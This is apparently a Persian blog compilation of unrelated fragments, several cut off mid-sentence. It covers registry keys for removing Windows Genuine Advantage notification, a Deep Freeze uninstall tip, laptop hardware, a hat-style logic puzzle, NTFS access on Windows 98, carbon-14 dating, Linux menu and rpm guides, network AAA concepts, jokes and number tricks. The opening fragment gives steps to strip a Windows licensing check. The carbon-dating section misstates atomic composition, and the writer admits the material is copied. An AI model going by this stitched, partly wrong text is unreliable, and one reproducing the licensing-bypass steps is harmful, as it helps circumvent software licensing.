HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\Notify\WgaLogon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WgaNotify

بعد از همه اين کارها، در حالي که کامپيوتر رو ري استارت ميکنيد، شيطان رو لعنت کنيد، عمو سيمور رو دعا کنيد، و دو انگشت شستتون رو به علامت ويکتوري و بيلاخ توام بالا بياريد، اگر ميخوايد خيلي نتيجه بگيريد، دو تا شست پاتون رو هم بالا بياريد که حتمن برسه به روح مايکروسافت! بعدش که ويندوز اومد بالا و همه چي مرتب بود و خبري از اون ستاره و اين صحبتها نبود، اون سه تا فايل رو که Rename کرده بوديد، پاک کنيد! اگر هم نکرديد يا اصلن همون اول بجاي Rename پاک کرده بوديد،

این دزدی رو از یه دزد دیگه انجام دادم که اونم از یه دزد زده.

http://www.darkside.blogfa.com اون دزدس

آدرسهاي وبلاگ شما :
[http://GILANEMA1.javanblog.com]
[http://GILANEMA1.javanblog.ir]
[http://GILANEMA1.jbg.ir]

محبوب شدن لپ‌تاپ‌ها در بین افراد عجیب به نظر می‌رسد.
این حقیقت که لپ‌تاپ‌ها با خواص زیادی که دارند از جهاتی نیز از رایانه‌های رومیزی کم می‌آورند باعث می‌شود که همه افرادی که هر روز با رایانه سر و کار دارند در مورد بهتر بودن آنها نسبت به رایانه‌های رومیزی شک کنند.
درست است که لپ‌تاپ‌ها قابل حمل هستند، باطری کمتری احتیاج دارند و سر و صدای کمتری نسبت به انواع رایانه‌های رومیزی تولید می‌کنند اما از سوی دیگر گفته می‌شود که لپ‌تاپ‌ها معمولا گرافیک و بلندگوهای بسیار ضعیفی دارند.

این تفاوت‌ها ممکن است به ظاهرا جزئی بیایند اما برای مصرف کننده‌ای که هر روز ساعت ها با آن سروکار دارد بسیار مشخص‌ است.

لپ‌تاپ‌ها در حالت کلی نسبت به رایانه‌های رومیزی قیمت بیشتری دارند. اما در عین حال، کاهش قیمت آنها هم پس از ارائه شدن مدل های جدیدتر حیرت انگیز است. اولین بار در ماه می سال ۲۰۰۵ بود که رکورد فروش لپ‌تاپ‌ها در مقابل رایانه‌های رومیزی شکسته شد و سازندگان رایانه‌های رومیزی پذیرفتند که محبوبیت لپ‌تاپ‌ها بیش از پیش شده است.

حال اینکه چطور ممکن است تمامی آن سخت افزارهایی که در رایانه‌های بزرگ رومیزی وجود دارد همگی در یک لپ‌تاپ کوچک جا بگیرد توضیحات مفصلی می‌طلبد. در حالت کلی لپ‌تاپ‌ها و رایانه‌های رومیزی سخت افزار و نرم افزارهای بسیار مشابهی دارند. اما تفاوت اصلی در آن است که چطور این سخت افزار در محیطی کوچک کنار هم قرار می‌گیرند.

اجزای لپ‌تاپ:

رایانه رومیزی تشکیل شده‌اند از : مادربورد,کارت ویدئو, هارد درایو و چندین قطعه دیگر که همگی در جعبه بزرگی که اصطلاحا "کیس" گفته می‌شود جا می‌گیرند. صفحه نمایش و صفحه کلید هم که با استفاده از سیم یا بدون سیم به "کیس‌ها" متصل می‌شوند و چه بخواهید و چه نخواهید فضای زیادی از میز در نهایت به خاطر انبوه سیم های متصل شده به این دستگاه رومیزی گرفته می‌شود.

لپ‌تاپ‌ها بسیار کوچکتر و سبکتر از رایانه‌های رومیزی هستند و اولین چیزی که در آنها به چشم می‌خورد صفحه تایپ آنهاست که حتی آن هم از انواع رومیزی بسیار کوچکتر است. به خاطر کوچک بودن اندازه لپ‌تاپ‌ها وسایل سخت افزاری این نوع رایانه باید سه خاصیت داشته باشد.

۱) در محل کوچکی جا شود.
۲) باتری را به شکل کنسروی مصرف کند
۳) گرمای زیادی تولید نکند
معمولا بسته به بهتر بودن نوع این سخت افزارها و اینکه تا چه حد سه خاصیت بالا را دارند , قیمت لپ‌تاپ‌ها تفاوت می‌کند. گران و یا ارزان بودن لپ تاپها دقیقا بستگی به همین سه خاصیت دارد.

پردازشگر:

"سی پی یو" رایانه شما با سیستم عامل همکاری می‌کند تا رایانه شما به بهترین شکل کار کند و در واقع آن را کنترل می‌کند و به شکل مغز رایانه شماست.

معمولا این سی پی یوها حرارت زیادی تولید می‌کنند و به خاطر همین موضوع است که در رایانه‌های رو میزی فضای زیادی به فن و خنک کننده‌ها اختصاص داده می‌شود.از آنجایی که در لپ‌تاپ‌ها چنین امکانی وجود ندارد بنابراین سی پی یو در آنها:

۱) در ولتاژ کمتر کار می‌کنند:
معمولا با پائین بودن ولتاژ در لپ‌تاپ‌ها پردازشگر آرامتر کار می‌کند تا گرمای کمتری تولید کند. بسیاری از لپ‌تاپ‌ها زمانی که به برق متصل باشند در ولتاژ بالا هم کار می‌کنند.
۲) سوکت‌ها و سنجاقها و گیره‌های متصل به "مادر بورد" معمولا جای زیادی می‌گیرد. در انواع لپ‌تاپ‌ها این سوکتها به طور کامل برداشته شده است. به همین خاطر است که معمولا در لپ‌تاپ‌ها برداشتن پردازشگر از مادر بورد امکان پذیر نیست.
۳) حالت آرامش و خواب دارد:
زمانی که لپ‌تاپ شما استفاده نمی‌شود و برای مدتی شما آن را روشن گذاشته واز آن دور شده‌اید رایانه و سیستم عمل به شکلی با هم کار می‌کنند که سرعت "سی پی یو" شما کاهش پیدا کند.

فن و خنک کننده:

لپ‌تاپ‌ها معمولا فن‌های بسیار کوچکی دارند و لوله‌های بسیار باریکی در آنها تعبیه شده است که گرما را از سی پی یو بیرون می‌برد. این ابزار معمولا در لبه لپ تاپها ساخته می‌شوند تا مسیر خارج شدن گرما کوتاه شود.

حافظه :

حافظه لپ‌تاپ می‌تواند به خاطر آرام کار کردن پردازشگرها مورد مطالعه بیشتر قرار بگیرد. در برخی از لپ‌تاپ‌ها حافظه را در نزدیکی سی پی یو قرار می‌دهند تا دسترسی به اطلاعات سریعتر باشد. برخی هم در محل های بزرگتر جا می‌گیرند تا اطلاعات در سطح پردازشگر و "مادر بورد" سریعتر حرکت کند.
همچون رایانه‌های شخصی،لپ‌تاپ‌ها هم "هارد دیسک" داخلی دارند که سیستم عامل و فایلهای اطلاعاتی را نگهداری می‌کند. در لپ‌تاپ‌ها اندازه این هارد دیسک ها بسیار کوچکتر از حالت عادی است و چرخش آن آرامتر است که سبب ایجاد گرمای کمتر و اتلاف باتری می‌شود.

صدا و تصویر:


قسمت گرافیکی در واقع یک پردازشگر کوچک است که عملیات پخش تصویر را انجام می‌دهد. این قسمت نیز گرمای زیادی تولید می‌کند. در بیشتر لپ‌تاپ‌ها قسمت گرافیکی در مادر بورد واقع شده و یا آنکه به شکل خاص برای استفاده از لپ‌تاپ‌ها با سایزهای کوچک ساخته می‌شود.
آنچه به طور یقین ثابت شده این است که گرافیک در لپ‌تاپ‌ها از رایانه‌های شخصی ضعیف‌تر است اما استفاده کنندگان معمولا متوجه این موضوع نمی‌شوند.
صفحه نمایش در لپ‌تاپ‌ها معمولا ۱۲ تا ۱۷ اینچی هستند و انواع گوناگونی دارند که هر روزه با اختراع انواع جدید تفاوت می‌کنند.

انرژی :

لپ‌تاپ‌ها و رایانه‌های رومیزی هر دو با برق کار می‌کنند. هر دو باتری دارند تا بتوانند ساعت و تاریخ را به طور مرتب بروز کنند. بر خلاف انواع رومیزی، لپ‌تاپ‌ها می‌توانند با استفاده از باتری و بدون برق چندین ساعت روشن بماند که البته به نوع باتری بستگی دارد..

باتری‌های مختلفی برای انواع لپ‌تاپ‌ها استفاده می‌شود که بستگی به قیمت شان متنوع هستند. بسیاری از سازندگان باتری‌ها مدعی اند که باتری‌ها تا ۵ ساعت مداوم کار می‌کنند. اما این موضوع دقیقا بستگی به آن دارد که از لپ‌تاپ چه استفاده‌ای می‌شود.

تاریخچه لپ‌تاپ:

حدود سال ۱۹۷۰ "آلان کی" مردی که در شرکت زیراکس کار می‌کرد تصمیم گرفت رایانه‌ای بسازد که بدون احتیاج به انواع سیم کار کند. این نوع رایانه گرچه هرگز مشهور نشد اما اولین جرقه‌ای بود که باعث شد فکر ساخت لپ‌تاپ‌ها به انسان خطور کند.
سال ۱۹۷۹ اولین رایانه قابل حمل ساخته شد. این رایانه ۳۴۰ کیلو بایت حافظه داشت و "ناسا" آن را که حدود ۸۰۰ دلار قیمت داشت و سنگین بود را برای پروژه‌های فضایی به کار گرفت.
این لپ‌تاپ به عنوان اولین نوع رایانه قابل حمل معرفی شد تا اینکه در سال ۱۹۸۶ شرکت آی بی ام اولین لپ‌تاپ حرفه ای را وارد بازار ساخت که ۲۵۶ کیلو بایت حافظه داشته و دو درایو دیسکت فلاپی با صفحه نمایش تخت داشت و مودم داخلی برای آن تعبیه شده بود.
این لپ‌تاپ حدود ۵.۴ کیلوگرم وزن داشت و به قیمت ۳۵۰۰ دلار به فروش می‌رسید توانست نام خود را به عنوان اولین لپ‌تاپ ثبت کن

to uninstall deep freeze run the program DFStr.exe again

براي برداشتن برنامه از روي سيستم DFStr.exe را اجرا کنيد. DFStr.exe هم براي نصب و هم براي حذف برنامه بکار گرفته مي شود.

- فرض كنيد :
- ۱۰۰ نفر آدم با هوش در يك سالن زنداني هستند.
- حداقل يك نفر و حداكثر همه آنها داراي يك خال بر روي صورتشان هستند.
- هيچ كدام از اين افراد نمي دانند كه آيا خود داراي خال هستند يا نه.
- به آنها گفته شده كه به ازاي هر آدم خال دار يك شبانه روز ( نه كمتر و نه بيشتر) مهلت دارند كه آدم هاي خال دار از سالن بيرون بيايند.
- اين افراد نمي توانند هيچ ارتباطي با افراد ديگر موجود در سالن برقرار كنند.
- تنها ارتباط موجود ديدن صورت افراد ديگر است.
- به هيچ امكاني هم دسترسي ندارند كه صورت خود را ببينند.
- خلاصه پيغام و پيام و آينه و .... ممنوع است.
- تعداد افراد خال دار معلوم نيست.
سؤال : با چه روشي ممكن است كه فقط افراد خال دار در پايان مهلت تعيين شده (n روز به ازاي n خال دار) از سالن خارج شوند؟

جواب - > فرض کنین یه نفر تو قبیله خال داشته باشه. اون فرد خالدار بقیه قبیله رو میبینه که هیچ کس خالدار نیست ولی چون رییس قبیله گفته اینجور افراد حتما وجود دارند، نتیجه میگیره فقط خودش خالداره و همون روز اول خودش رو میکشه. از طرف دیگه بقیه افراد بدون خال میبینن یه نفر خال داره ولی خودشون نمیدونن خال دارن یا نه. مثل بالا برای خودشون استدلال میکنن که اگه خودشون خال نداشته باشن اون فرد خالدار باید امروز خودش رو بکشه و اگر خودشون خال داشته باشن اون فرد ديگه امروز رو منتظر خواهد موند. اون فرد خالدار روز اول خودشو ميکشه و بقيه ميفهمن که خودشون خالدار نبودن. اين از يکی.
حالا برای دو نفر همين استدلال رو تکرار کنين. فرض کنين دو نفر تو قبيله خال دارن. اونی که خالداره ميبينه يه نفر تو قبيله خال داره ولی نميدونه خودش هم خال داره يا نه. با خودش ميگه اگه من خال نداشته باشم اون فرد خالدار بايد امروز خودش رو بکشه و اگر خال داشته باشم بايد منتظر بمونه. اون فرد ديگه هم همين جور استدلال ميکنه و هر دوشون روز اول رو کاری نميکنن و منتظر ميمونن. در نتيجه ميفهمن که هر دو تا خالدارن و روز دوم خودشون رو ميکشن. اما اونايی که خال ندارن ميبينن دو نفر تو قبيله خال دارن. اونا دو روز صبر ميکنن تا سرنوشت اين دو تا معلوم بشه و چون روز دوم اون دو نفر خودشون رو ميکشن ميفهمن که خودشون خال نداشتن.
به همین ترتیب میتونین برای سه نفر و چهار نفر و ... تکرار کنین استدلال رو. در نتیجه اگه n نفر خالدار باشن تا روز n-1 ام صبر ميکنن و بقيه که خال ندارن تا روز n ام. روز n ام افراد خالدار دسته جمعی خودشون رو ميکشن و از اينجا بقيه ميفهمن که خودشون خال ندارن. يعنی تا صبح روز n+1 فرد خالداری تو قبيله وجود نخواهد داشت. پس تو این قبیله ما 7 نفر خالدار بودن چون تا صبح روز هشتم دیگه فرد خالداری تو قبیله نبوده

بر روي کامپيوتر بسياري از کاربران همزمان دو سيستم عامل نصب مي باشد (معمولا ويندوز 98 و ME در کنار ويندوزي از خانواده NT )

استفاده از ويندوز NT با فايل سيستم NTFS براي بسياري از کاربران ايجاد مشکل مي کند ، از آنجائیکه ويندوز 98 , ME فايل سيستم NTFS را پشتيباني نمي کند ، درايوهاي با فرمت NTFS در آن جا قابل دسترسي نخواهد بود.

حال چگونه درايو هاي NTFS خود را در ويندوز 98 , ME مشاهده کنيم ؟

ما براي مشاهده پارتيشن NTFS درويندوز 98 , ME روش زیر را پیشنهاد میدهیم :

استفاده از برنامه هايي که در ويندوز هاي 98 و ME قابليت دسترسي به پارتيشن NTFS را فراهم مي کنند .

براي دسترسي به پارتيشن NTFS در ويندوز 98 وME مي توانييد از برنامه NTFS Reader استفاده نمائید.

براي دريافت این برنامه مي تواننيد از اين لينک استفاده کنيد :

NTFS Reader

در يک حفاري تکه استخواني پيدا مي شود و باستان شناسان مي گويند که اين استخوان 5 هزار سال عمر دارد. يک بچه ماموت در آند کشف مي شود و عمر آن را بيش از 2 هزار سال تخمين مي زنند. اما دانشمندان چگونه مي فهمند که يک شيء يا اجساد و بقاياي موجودات زنده متعلق به چه زماني هستند. تاريخ سنجي به وسيله کربن 14 يک روش رايج و مطمئن براي تعيين قدمت بقاياي موجودات زنده است ، با اين شرط که حداکثر 50 هزار سال عمر داشته باشند.اين روش فقط درخصوص اشيايي به کار مي رود که يا خود زماني زنده بوده اند مانند استخوان ، بقاياي گياهان و بقاياي اجساد حيوانات و انسان ها و يا اين که از موجودات زنده ساخته شده اند. مانند لباسهاي پنبه اي يا کتاني ، وسايل چوبي و غيره.

کربن 14 چگونه ساخته مي شود؟

اشعه کيهاني هر روز و به مقدار زياد به اتمسفر زمين مي رسد. براي مثال در هر ساعت نيم ميليون تابش کيهاني به هر فرد مي تابد. اين اشعه کيهاني با اتمهاي اتمسفر برخورد مي کند و تابشهاي ثانويه را به صورت نوترون هاي پر انرژي به وجود مي آورد. اين نوترون هاي پرانرژي با اتمهاي نيتروژن برخورد مي کنند. پس از برخورد نوترون با نيتروژن 7(14پروتون و 7نوترون) اين اتمها به اتمهاي کربن 6(14 پروتون و 8نوترون) به اضافه اتمهاي هيدروژن (يک پروتون و يک نوترون) تبديل مي شوند.کربن 14 راديواکتيو است با نيمه عمري حدود 5700 سال. (نيمه عمر مدت زماني است که نصف اتمهاي يک ماده راديواکتيو به دليل تابش غيرفعال مي شوند).

کربن 14 در موجودات زنده

اتمهاي کربن 14 که بر اثر تابش کيهاني به وجود آمده اند با اتمهاي اکسيژن ترکيب شده و گاز دي اکسيدکربن مي دهند. گياهان اين گاز را جذب کرده و بر اثر پديده فتوسنتز کربن 14 در فيبر گياهان وارد مي شود.حيوانات و انسان ها اين گياهان را مي خورند و کربن 14وارد بدن آنها مي شود. نسبت کربن 14 به کربن معمولي (کربن)12 در هوا و بدن موجودات زنده در تمام زمانها تقريبا ثابت بوده و هست. تقريبا در هر تريليون اتم کربن يک اتم ، اتم کربن 14است.کربن 14واپاشي مي کند. ولي هميشه تا زماني که موجود زنده است ، به دليل تبادل با محيط بيرون اتمهاي واپاشيده شده با اتمهاي جديد کربن 14جايگزين مي شوند و اين نسبت تقريبا ثابت مي ماند.

تعيين تاريخ يک فسيل

به محض اين که يک موجود زنده مي ميرد، دريافت کربن آن از محيط قطع مي شود. نسبت کربن 12 به کربن 14 در لحظه مرگ موجود با مقدار استاندارد آن در بدن بقيه موجودات زنده برابر است ؛ ولي پس از مرگ کربن 14 واپاشيده شده و با هيچ کربن 14 جديدي جايگزين نمي شود.کربن 14 بتدريج و با سرعت بسيار کم از بين مي رود در حالي که مقدار کربن 12 ثابت است.با به دست آوردن نسبت کربن 12 به کربن 14 در نمونه مورد بررسي و مقايسه آن با مقدار استاندارد اين نسبت در موجودات زنده مي توان قرني را که اين موجود در آن مي زيسته است ، با دقت بسيار خوبي محاسبه کرد. فرمول محاسبه عمر فسيلها با استفاده از کربن 14به شرح زير است :

به همین جهت در این فرصت تصمیم گرفتم راه حل یک مشکل کوچک ولی مهم را که برای کاربران مبتدی یا متوسط لینوکس بسیار حائز اهمیت است ذکر نمایم . مشکل مذکور ناشی از عدم مشاهده منوی استارت یا شروع رابطهای گرافیکی فوق یا بهتر بگویم عدم نمایش برخی برنامه های جدید نصب شده برروی سیستم در این منوهاست . نظر به اینکه منوی شروع یا استارت در رابط گرافیکی کاربر بعد از هرگونه اعمال تغییرات توسط سیستم یا خود کاربران میبایست روزآمد یا update گردد و گاهی این عمل بصورت خودکار صورت نمیگیرد ممکن است یک کاربر پس از نصب یک برنامه جدید با مراجعه به منوی استارت این محیطهای گرافیکی منوی مذکور را درهم ریخته یا در برخی نقاط غیر قابل مشاهده ببیند و یا برنامه نصب شده خود را که گاها همراه سی دی اصلی لینوکس عرضه شده و طبعا نباید مشکلی در هنگام مشاهده در رابط گرافیکی داشته باشد در منوی مذکور مشاهده ننماید . در اینگونه موارد دو کار میتوان انجام داد :

۱ – با اجرای برنامه menuconfig از خط فرمان shell و در محیط گرافیکی این برنامه اقدام به رفع نواقص احتمالی و جایگزین نمودن پایانه های معیوب نمود که البته اینکار مستلزم وجود برنامه مذکور درسیستم کاربر است و ممکن است هر توزیع لینوکس با توجه به محیط گرافیکی مورد استفاده خود برنامه خاصی را برای اینکار تدارک دیده باشد .

۲ – اما راه حل بسیار مطمئن و سریع برای روزآمد کردن و اصلاح اشکالات منوی استارت استفاده از دستور update-menus -v در محیط فرمان shell میباشد .

update-menus -v $

توجه داشته باشید که اجرای این فرمان نیاز به مجوز کاربر ریشه یا super user ندارد و هر کاربر تعریف شده در سیستم منوی استارت اختصاصی خود را با اجرای این فرمان روزآمد یا update مینماید .

استفاده از فرمان تکمیلی v- یا همان verbose mode اختیاری است لیکن باعث نمایش اطلاعات مربوط به به روزرسانی منوی استارت و انجام عملیات برروی تمام رابطهای گرافیکی نصب شده برروی سیستم مثل gnome , kde ,twm و غیره میگردد .

زندگی قصه مرد یخ فروشی است كه یك روز از او پرسیدند : فروختی ؟ گفت : نخریدند تمام شد

سعی کن تنها باشی: زیرا تنها به دنیا آمده ای و تنها از دنیا خواهی رفت. بگذار عظمت عشق را درک نکنی: زیرا آنقدر عظیم است که تو را نابود خواهد کرد. بگذار خانه ی عشقت خالی از وجود باشد: زیرا اگر عشقی در آن منزل کند به ویرانه های آن هم رحم نخواهد کرد. اما اگر عاشق شدی، سعی کن تنها یک نفر را دوست داشته باشی. سعی کن عشقی که داری عشق پاک باشد، به خنده ی او بخند و به گریه ی او گریه کن و تنها برای عشق خود قدم برد

انواع مرد: اروپایی:یه زن داره یه دوست دختر(زنشو بیشتر از دوست دخترش دوست داره) امریکایی: یه زن داره یه دوست دختر(دوست دخترشو بیشتراز زنش دوست داره) ایرانی:یه زن داره سی تا دوست دختر(ننه اش رو از همه بیشتر دوست داره

از قديم رياضي به دو دسته ي حساب و هندسه تقسيم ميشده در يونان بيشتر رياضيدانان بزرگ به علم هندسه پرداخته اند زيرا در آن زمان كه يوناني ها برده داري ميكردند علومي را كه كاربردي بود تحقير ميكردند زيرا آنها تمام كارها و علوم كاربردي را مختص برده ها مي دانستند و چون فكر ميكردند كه علم هندسه كاربردي ندارد به علم هندسه پرداختند و كشفهاي زيادي را در هندسه به دست آوردند ولي در زمينه ي حساب ضعف هاي زيادي داشتند البته در چند سده ي آخر كه بيشتر دانشمندان به اسكندريه رو آورده بودند كارهاي اندكي در زمينه ي رياضيات محاسبهاي داشتند.يوناني ها حتي نتوانستند راه ساده اي براي عدد نويسي پيشنهاد كنند و عددها را به كمك حروف الفبا مينوشتند. اما در سده ها و هزاره هاي پيش از دانش يونان مردمي كه در سرزمينهاي ايران، بابل، مصر، چين و جاهاي ديگر زندگي مي كردند از آن جا كه به كاربرد هاي رياضيات نظر داشتند نه تنها در عدد نويسي، كه به طور كلي در زمينه هاي مختلف رياضيات محاسبه اي، بسيار پيشرفته بودند و با عددهاي كوچك و بزرگ كار مي كردند.

روابط جالب در رياضی

1=1×1
121=11×11
12321=111×111
1234321=1111×1111
...

2121=21×101
3838=38×101
9393=93×101

قانون: هر عددي در 101 ضرب شود در حاصل دوبار تكرار مي شود

 AAA    که مخفف Authentication, Authorization and Accounting است سه محور اصلی در کنترل دسترسی در شبکه هستند که در این بخش در مورد هریک از آنها به طور مجزا و مختصر صحبت می‌شود. ابتدا تعریفی از هریک از این مفاهیم ارائه می‌دهیم.

۱ - Authentication

۱-۱ - مفهوم Authentication

    به معنای وارسی عناصر شناسایی ارائه شده از سوی کاربر،‌ تجهیزات یا نرم‌افزارهایی است که تقاضای استفاده و دسترسی به منابع شبکه را دارند. عناصر شناسایی در ابتدایی‌ترین و معمول‌ترین حالت شامل نام کاربری و کلمه عبور می‌باشند. در صورت نیاز به بالاتر بودن پیچیدگی فرایند کنترل و وارسی هویت، می‌توان با اضافه نمودن عناصر شناسایی به این مهم دست یافت. بدیهی‌ است که با اضافه نمودن فاکتورها و عناصر شناسایی، نوع خادم مورد استفاده، پایگاه‌های داده‌ای مورد نظر و در بسیاری از موارد پروتکل‌ها و استانداردها نیز باید مطابق با تغییرات اعمال شده در نظر گرفته شوند تا یکسانی در ارائه خدمات در کل شبکه حفظ شود.

    پس از ارائه عناصر شناسایی از سوی متقاضی، سیستم کد کاربری و کلمه عبور را با بانک اطلاعاتی مختص کدهای شناسایی کاربری مقایسه کرده و پذیرش یا عدم پذیرش دسترسی به منابع را صادر می‌کند.

    عمل Authentication، در طراحی‌ شبکه‌هایی با حجم کم و متوسط عموماً توسط تجهیزات مسیریابی و یا دیوارهای آتش انجام می‌گیرد. علت استفاده از این روش مجتمع سازی و ساده سازی پیاده‌سازی عمل Authentication است. با استفاده از امکانات موجود نیاز به استقرار یک خادم مجزا برای صدور پذیرش هویت متقاضیان دسترسی مرتفع می‌گردد.

    از سوی دیگر در شبکه‌های با حجم و پیچیدگی نسبتاً بالا،‌ عموماً با توجه به پردازش بالای مختص عمل Authentication، خادمی بصورت مستقل و مجزا به این امر اختصاص می‌یابد. در این روش از استانداردها و پروتکل‌های مختلفی همچون TACACS+ و RADIUS استفاده می‌گردد.

۱-۲ -  فعال نمودن Authentication

    فعال نمودن Authentication بر روی تجهیزات مورد استفاده در شبکه عملی است که عموماً در چهار مرحله انجام می‌شود :

الف - فعال نمودن AAA بر روی سخت‌افزارهای مورد نظر

ب -  ایجاد پایگاه‌ داده‌ای از کدهای کاربری کاربران یا تجهیزات شبکه به همراه کلمه‌های عبور. همانگونه که ذکر شد، این پایگاه می‌تواند در داخل تجهیزات مورد استفاده در شبکه‌های با حجم کم پیاده‌سازی شود. در شبکه‌های با حجم نسبتاً بالا که در آنها نیاز به استفاده از خادمی مختص عمل Authentication احساس

می‌شود، تجهیزات فعال شبکه به گونه‌ای پیکربندی می‌شوند که عملAuthentication را با استفاده از پایگاه‌های داده‌ای مستقر بر روی خادم‌های

مختص این فرایند،‌ انجام دهند.

ب – ایجاد فهرست(های) روش انجام عمل Authorization. این فهرست‌ها علاوه بر تعیین روش‌ مورد نظر برای عمل Authorization، مبین سرویس مورد نظر برای

عمل Authorization نیز می‌باشند.

ج – اعمال فهرست(های) روش ساخته شده ار مرحله قبل.

۳ - Accounting

۳-۱ – مفهوم Accounting

Accounting آخرین بخش از فرایند جمعی AAA است. طی این فرایند، گزارشی از عملکرد کاربران یا سخت‌افزارهایی که هویت آنها طی اعمال Authentication و Authorization تایید شده است، توسط خادم AAA تهیه می‌شود. این عمل می‌تواند با استفاده از خادم های خارجی که اس پروتکل‌ها و استانداردهایی چون TACACS+ و RADIUS استفاده می‌کنند انجام گیرد.

    به بیان دیگر،‌ این عمل قدمی فراتر از دو مرحله پیشین برداشته،‌ و پیگیری بعدی، پس از احراز هویت را انجام می‌دهد. پیام‌های Accounting به شکل رکورد،‌ میان تجهیزاتی که از طریق آنها دسترسی متقاضی درخواست شده و پایگاه‌های داده‌ای از قبیل TACACS+ یا RADIUS، تبادل می‌گردد.

۳-۲ – فعال سازی Accounting

    فرایند فعال سازی Accounting مشابه Authorization است که مهم‌ترین مراحل شامل ایجاد فهرست‌های روش Accounting و اعمال آنهاست.

بسته‌های نرم‌افزاری چه هستند و چرا به آنها نياز داريم؟

هنگامی که توزیع لینوكس خود را نصب می‌کنید، اکثر نرم‌افزارهای مورد نيازتان همراه آن نصب می‌شود. ولی با این حال پیش می‌آید که نياز به بسته‌های دیگری داشته باشید و یا بسته‌های نرم‌افزارهای موجود را بخواهید به نسخه‌های جدیدتر ارتقا دهید. در چنین مواردی است که باید بسته‌های جدید را روی CD و یا از اینترنت دریافت نموده و نصب نمایید.

بسته‌های نرم‌افزاری کار نصب نرم‌افزارهای کاربردی را در لینوكس آسان کرده‌اند. دیگر لازم نیست برای نصب هر نرم‌افزار، کاربر کدهای منبع را دریافت کرده، آنها را کامپایل نموده و نصب کند. کاری که بسیاری از کاربران از انجام آن ناتوان هستند.

همانطور که متوجه شدید، بسته‌های نرم‌افزاری حاوی برنامه‌های قابل اجرا و آماده برای نصب هستند. ممکن است در اینترنت به انواع مختلفی از بسته‌های نرم‌افزاری برخورد نمایید که البته همه آنها حاوی نرم‌افزارهای آماده برای نصب نیستند که جلوتر درباره آنها توضیح خواهم داد. پر کاربردترین بسته‌های آماده نصب نرم‌افزارهای کاربردی، بسته‌های نوع rpm و deb هستند. در این مقاله ما به بررسی بسته‌های نرم‌افزاری با فرمت rpm و مدیریت آنها خواهیم پرداخت و در مقاله جداگانه‌ای، مدیریت بسته‌های deb را که مخصوص لینوكس debian و توزیع‌های مبتنی بر آن است را بررسي خواهیم کرد.

درک نامگذاری و فرمت بسته های نرم‌افزاری

وقتی بسته ای را از اینترنت دانلود می‌کنید، می‌بینید که از یک نام، تعدادی شماره، نقطه، gz و tar تشکیل شده است. خوب اینها چه معنی دارند؟ ابتدا این اعداد و حرفها پیچیده به نظر می‌رسند در صورتی که اگر برایتان شرح داده شوند، بسیار ساده هستند. پس از مدتی به این شیوه نامگذاری عادت خواهید کرد. بیشتر بسته های نرم‌افزاری لینوکس از قاعده نامگذاری GNU استفاده می‌کنند. مثال‌های زیر فرمت‌های گوناگون بسته های نرم‌افزاری را نشان می‌دهد :

mycoolapp-4.2.3.i386.rpm
mycoolapp-4.2.3.tar.gz
mycoolapp-4.2.3.src.tar.gz
mycoolapp-4.2.3.bin.SPARC.tar.gz
mycoolapp-4.2.3.bin.ELF.static.tar.gz

این مثالها بسته های مختلف یک نرم‌افزار هستند. نام این بسته نرم‌افزاری mycoolapp است. پس از نام بسته ، شماره نسخه آن که 4.2.3 است قرار دارد. اولین شماره شماره اصلی یا major، دومین شماره شماره فرعی یا minor و آخرین شماره شماره وصله یا patch است. پس از شماره نسخه، نقطه ای قرار دارد که بعد از آن بخش های انتخابی قرار دارند که نشانگر محتوای بسته و چگونگی فشرده سازی آن هستند.

خط نخست یک بسته نرم‌افزاری rpm را نشان می‌دهد. rpm مخفف Redhat Package Manager است. i386 که قبل از rpm قرار دارد، نشان دهنده این است که بسته حاوی نرم‌افزار اجرایی برای کامپیوترهای PC معمولی است. فرمت rpm که ابتدا توسط Redhat ارائه شد، اکنون تبدیل به یک استاندارد برای پخش بسته های نرم‌افزاری لینوکس شده است. ببیشتر توزیع‌های لینوكس مانند ردهت، زوزه، ماندریک و... از این سیستم بسته بندی نرم‌افزار استفاده می‌کنند.

rpm در مقابل کد منبع

بسته هایی که بصورت فرمت rpm ارائه می‌شوند به سادگی قابل نصب بوده و برداشتن آنها نیز به سادگی امکان پذیر است. برای مدیریت بسته‌های rpm هم ابزارهای گرافیکی و هم ابزارهای متنی وجود دارند. در صورتی که در دنیای لینوکس تازه کار هستید، همیشه سعی کنید از این فرمت برای دریافت نرم‌افزارها استفاده نمایید.

- RPM: نصب نرم‌افزارها با استفاده از بسته‌های rpm بسیار آسان است. برای نصب یک بسته rpm شما نیازی به دانستن اطلاعاتی در مورد makefile ها و کامپایلرها ندارید. همانطور که در بالا نیز اشاره کردم، ابزارهایی نیز برای مدیریت این بسته‌ها فراهم آمده است. هنگامی که یک بسته rpm را نصب می‌کنید، ابزارهای rpm سایر نرم‌افزارهای احتمالی مورد نیاز این بسته را نیز بررسی کرده و در صورت نیاز به نصب بسته دیگری به شما اعلام میکنند.

- کد منبع (Source Code) : برخی اوقات تا ایجاد بسته های rpm یک نرم‌افزار، مدتی طول می‌کشد. در این مواقع باید از کد منبع آن استفاده کنید. همچنین می‌توانید با ایجاد تغییراتی در کد منبع نرم‌افزار، آنرا برای خود مناسبتر کنید. اکثر کاربران حرفه ای لینوکس کار کردن با کد منبع را ترجیح می‌دهند.

خوب به مثال بالا برمی‌گردیم. در دوخط بعدی بسته‌هایی قرار دارند که حاوی کد منبع نرم‌افزار هستند. هـمـانطور که مـی‌بـینید، این بسته‌ها توسط دستور tar آرشیو شده (tar) و توسط دستور gzip فشرده شده‌اند (gz). شما از این دو فرمان برای باز کردن و خارج کردن از حالت فشردگی بسته‌های نرم‌افزاری استفاده خواهید کرد.

بین شماره های نسخه و پسوند های tar.gz بخش های اختیاری می‌توانند قرار گیرند. این بخش ها توسط نقطه از هم جدا می‌شوند و اطلاعات خاصی مانند نوع پردازنده‌ای که کدهای اجرایی بر روی آنها اجرا خواهد شد، نوع کدهای اجرایی و ... را فراهم می‌کنند. برای مثال bin.SPARC نشان می‌دهد که بسته حاوی کدهای اجرایی است که بر روی ایستگاههای کاری مبتنی بر پردازنده‌های SPARC اجرا خواهد شد.

استفاده از انواع گوناگون آرشیوها و فرمت مستندات

